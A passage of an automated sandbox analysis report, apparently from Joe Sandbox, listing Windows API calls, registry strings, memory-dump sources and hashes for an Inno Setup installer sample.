                                                                            • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                            • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                            • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                            • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                            • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                            • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                            • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                          • String ID: Setup
                                                                          • API String ID: 291738113-3839654196
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                          • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A15940CurrentThread
                                                                          • String ID: RzE
                                                                          • API String ID: 1959240892-1126107055
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                          • API String ID: 3535843008-1113070880
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: CreateFile
                                                                          • API String ID: 2528220319-823142352
                                                                          APIs
                                                                            • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                          • API String ID: 2906209438-2320870614
                                                                          APIs
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2492108670-2683653824
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Append$System
                                                                          • String ID:
                                                                          • API String ID: 1489644407-0
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                          • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                          • 73A0A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570ObjectSelect
                                                                          • String ID:
                                                                          • API String ID: 1230475511-0
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 65125430-0
                                                                          • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                          • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                          • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                          • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                          APIs
                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                          • TranslateMessage.USER32(?), ref: 0042449F
                                                                          • DispatchMessageA.USER32(?), ref: 004244A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 4217535847-0
                                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                          APIs
                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Prop$Window
                                                                          • String ID:
                                                                          • API String ID: 3363284559-0
                                                                          • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                          • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                          • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                          • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                          • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableEnabledVisible
                                                                          • String ID:
                                                                          • API String ID: 3234591441-0
                                                                          • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                          • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                          • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                          • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: InitializeWizard
                                                                          • API String ID: 2558294473-2356795471
                                                                          • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                          • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                          • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                          • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-1019749484
                                                                          • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                          • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                          • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                          • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                          Strings
                                                                          • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: Inno Setup: Setup Version
                                                                          • API String ID: 3702945584-4166306022
                                                                          • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                          • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                          • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                          • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: NoModify
                                                                          • API String ID: 3702945584-1699962838
                                                                          • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                          • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                          • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                          • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 71445658-1109719901
                                                                          • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                          • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                          • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                          • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                          • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                          • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                          • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                          • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                          APIs
                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                            • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                            • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                            • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                          • SendNotifyMessageA.USER32(00020464,00000496,00002711,-00000001), ref: 0047CBF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
